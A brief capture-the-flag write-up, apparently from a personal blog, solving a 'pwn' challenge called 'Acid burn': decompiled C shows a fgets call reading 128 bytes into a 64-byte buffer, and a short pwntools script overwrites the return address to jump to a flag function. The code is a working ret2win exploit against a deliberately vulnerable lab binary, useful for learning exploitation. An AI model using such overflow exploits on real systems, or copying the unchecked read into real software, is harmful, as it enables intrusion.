+++
date = '2025-04-28T12:00:00+02:00'
draft = false 
title = 'Acid burn'
tags = ['pwn']
+++

Here is the decompiled code for the challenge.
```c
int main(void)
{
  int iVar1;
  char input [64];
  
  printf("What is the password?\n?: ");
  fflush(stdout);
  fgets(input,0x80,stdin);
  iVar1 = strcmp(input,"password\n");
  if (iVar1 != 0) {
    puts("incorrect password");
    fflush(stdout);
  }
  return 0;
}
```

There is a pretty large buffer overflow on the `input` variable and there also conveniently is a function called `flag` that displays the flag (and of course all the protections are disabled).  
This is a classic ret2win scenario where we have to overwrite the return pointer to jump to the `flag` function.  
A small python script using pwntools should do the job.
```python
io = start()

payload = flat(
        b'A'*(64+8),
        pack(elf.symbols.flag))

write("payload", payload)
io.sendlineafter(b'?: ', payload)
io.interactive()
```

I didn't save the flag but this works and solves the challenge.